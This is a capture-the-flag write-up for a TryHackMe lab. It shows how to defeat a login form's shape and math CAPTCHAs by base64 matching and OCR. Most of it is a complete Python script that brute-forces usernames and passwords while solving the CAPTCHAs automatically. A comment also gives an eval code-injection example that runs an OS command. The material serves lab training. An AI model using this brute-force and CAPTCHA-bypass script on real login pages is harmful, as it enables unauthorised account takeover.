CTF tryhackme capturereturns
In this room, we’ll see how to bypass 2 custom CAPTCHA systems using python
https://tryhackme.com/r/room/capturereturns
Login form analysis
- we need to bypass a login form security measures
- after a few failed login attempts, we get 2 types of CAPTCHA
- the first CAPTCHA system is about identifying a shape in an image
- the second CAPTCHA system is about solving a mathematical operation written as an image
- after solving 3 CAPTCHAs in a row, we can use the login form again
- after 3 failed login attempts, we have to solve the CAPTCHAs again
The shapes
- good news, the shapes are static (eg a circle will always have the same base64 value)
- an easy way to differentiate the images values would be to extract 3 pieces of strings that are only in one of them.
- example for the circle:
- get a CAPTCHA with triangle shape -> right click on it -> open image in new tab -> copy the url -> paste it in a file “circle.txt”. Do the same for the other shapes
- copy a long enough string
head -c 300 ./shapes/circle.txt
get a part of the image value- verify that it isn’t in the other shapes
grep "PeZ7dZ5+Z93w+cz4zDbSDstRZGnqOljqKFbiOYwWu49T6Mtg8" ./shapes/triangle.txt
grep "PeZ7dZ5+Z93w+cz4zDbSDstRZGnqOljqKFbiOYwWu49T6Mtg8" ./shapes/square.txt
- store the string, then repeat for the other 2 shapes
- after this, we can build a list of dictionaries
1 2 3 4 5
shapes_data = [ {"answer": "circle", "unique": "PeZ7dZ5+Z93w+cz4zDbSDstRZGnqOljqKFbiOYwWu49T6Mtg8"}, {"answer": "square", "unique": "TmpBGEDx7wKWoiS4ARtXYMMa3AwJsAQKXIMLcA92LoCGgrgCGhpsgfvu3IyveA"}, {"answer": "triangle", "unique": "1icoweuEUzHY/IV/opz4Nc56C/vB39X5+C35OfoNH8d2/wWHa/fr"} ]
Extracting text from an image
Asking Llama 3 70b
- let’s get some help from a Llama 3 70b model
- alright! If that works we’re golden. Let’s first try with a local image
POC, extracting text from image
pip install requests beautifulsoup4 pillow pytesseract
- on kali linux, I had to also install those packages too
sudo apt install tesseract-ocr libtesseract-dev -y
- first we generate a CAPTCHA with a mathematical operation -> right click on it -> open image as new Tab
- copy the base64 value after
base64,
- paste the string in base64.b64decode(…)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import base64
import requests
from bs4 import BeautifulSoup
from PIL import Image
import pytesseract
img_data = base64.b64decode("iVBORw0KGgoA[.....]")
# Save the image to a temporary file (required for OCR)
with open('temp.png', 'wb') as f:
f.write(img_data)
image = Image.open('temp.png')
image = image.convert('L') # Convert to grayscale
# Perform OCR using Tesseract
text = pytesseract.image_to_string(image)
print(text) # Extracted text from the image
- it works! The hardest part is done, now let’s just code the whole logic
Final script
- here’s the final code, heavily commented
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
#!/usr/bin/python
import requests
import re
import base64
import urllib3
from bs4 import BeautifulSoup
from PIL import Image
import pytesseract
import time
URL = "http://10.10.181.29/login"
REQUEST_TIMEOUT = 0.3
first_request = True
# Initializing a session
session = requests.Session()
data = {'username': '','password':''}
# Removing the line feed (\n) from the usernames and passwords read from the respective files
usernames = open('usernames.txt','r').read().splitlines()
passwords = open('passwords.txt', 'r').read().splitlines()
# "unique" is a string found only in the base64 value of the image shape "answer", and not the other 2
shapes_data = [
{"answer": "circle", "unique": "PeZ7dZ5+Z93w+cz4zDbSDstRZGnqOljqKFbiOYwWu49T6Mtg8"},
{"answer": "square", "unique": "TmpBGEDx7wKWoiS4ARtXYMMa3AwJsAQKXIMLcA92LoCGgrgCGhpsgfvu3IyveA"},
{"answer": "triangle", "unique": "1icoweuEUzHY/IV/opz4Nc56C/vB39X5+C35OfoNH8d2/wWHa/fr"}
]
# Solve an operation from text eg " 5+ 3" -> "8"
# While it's not mandatory to use a regex here, it's important to filter text going in eval as it can execute any python code
# cf eval("__import__('os').system('id')")
def solve_operation(text):
captcha_syntax = re.compile(r'(\s*\s*\d+\s*[+*-/]\s*\d+)\s*')
captcha = captcha_syntax.findall(text)
# We couldn't parse the operation, we must not pass an empty array to eval(), it will raise an error (should never happen since I filter the part after '=')
if (len(captcha) == 0):
print(f'Impossible to parse the operation {text}')
return 'Error'
else:
return eval(' '.join(captcha))
# Send a post request until we don't get a timeout
def send_response(session, URL, data, timeout, ttype):
response = None
while True:
try:
response = session.post(URL, data=data, timeout=REQUEST_TIMEOUT)
if response.status_code != 200:
print("A request wasn't successfull")
else:
break
# Filter the many kind of errors related to Timeout
except (requests.exceptions.ConnectionError, requests.exceptions.ReadTimeout, urllib3.exceptions.ReadTimeoutError, TimeoutError) as e:
print(f'Timed out {ttype}') # Print the kind of requests we were doing
continue
return response
for user in usernames:
for password in passwords:
# Try a login request with a user/pass couple
data = {'username': user,'password': password}
print(f'trying: {user} {password}')
response = send_response(session, URL, data, REQUEST_TIMEOUT, "login")
# CAPTCHAs We need to solve 3 CAPTCHAs before trying our login request
if 'Detected 3 incorrect login attempts!' in response.text:
while 'Detected 3 incorrect login attempts!' in response.text:
soup = BeautifulSoup(response.content, 'html.parser')
# Extract the base64 encoded image
img_tag = soup.find('img')
base64_img_data = img_tag['src'].split(',')[1]
answer = ''
captcha_data = ''
captcha_type = ''
# SHAPE SELECTION
if 'Describe the shape below' in response.text:
captcha_type = 'shape'
for row in shapes_data:
# We found the unique string in the base64 value of the image, it's an "answer" shape
if row["unique"] in base64_img_data:
answer = row["answer"]
break
# MATHEMATICAL OPERATION
else:
captcha_type = "operation"
# Get convert the base64 image value to bytes
img_data = base64.b64decode(base64_img_data)
# Save the image to a temporary file (required for OCR -> Optical Character Recognition)
with open('temp.png', 'wb') as f:
f.write(img_data)
image = Image.open('temp.png')
image = image.convert('L') # Convert to grayscale
# Perform OCR using Tesseract
operation = pytesseract.image_to_string(image)
# Get the text before '=', we only want the operation, not '=?'
operation = operation.split('=')[0]
answer = solve_operation(operation)
captcha_data = operation
# We didn't find the shape (should never happen)
if answer == '':
print('Shape was not found!')
print(base64_img_data)
exit()
data = {'captcha': answer}
# Since we replaced the response content, we'll check if we still need to solve CAPTCHAs in the while condition
response = send_response(session, URL, data, REQUEST_TIMEOUT, f'CAPTCHA {captcha_type}')
# Retry the login request now that we solved 3 CAPTCHAs
if first_request:
print(f'repeat: {user} {password}')
data = {'username': user,'password': password}
response = send_response(session, URL, data, REQUEST_TIMEOUT, "login repeat")
first_request = False
elif 'Error' not in response.text:
print(f'SUCCESS: {user} --- {password}')
exit()
This post is licensed under CC BY 4.0 by the author.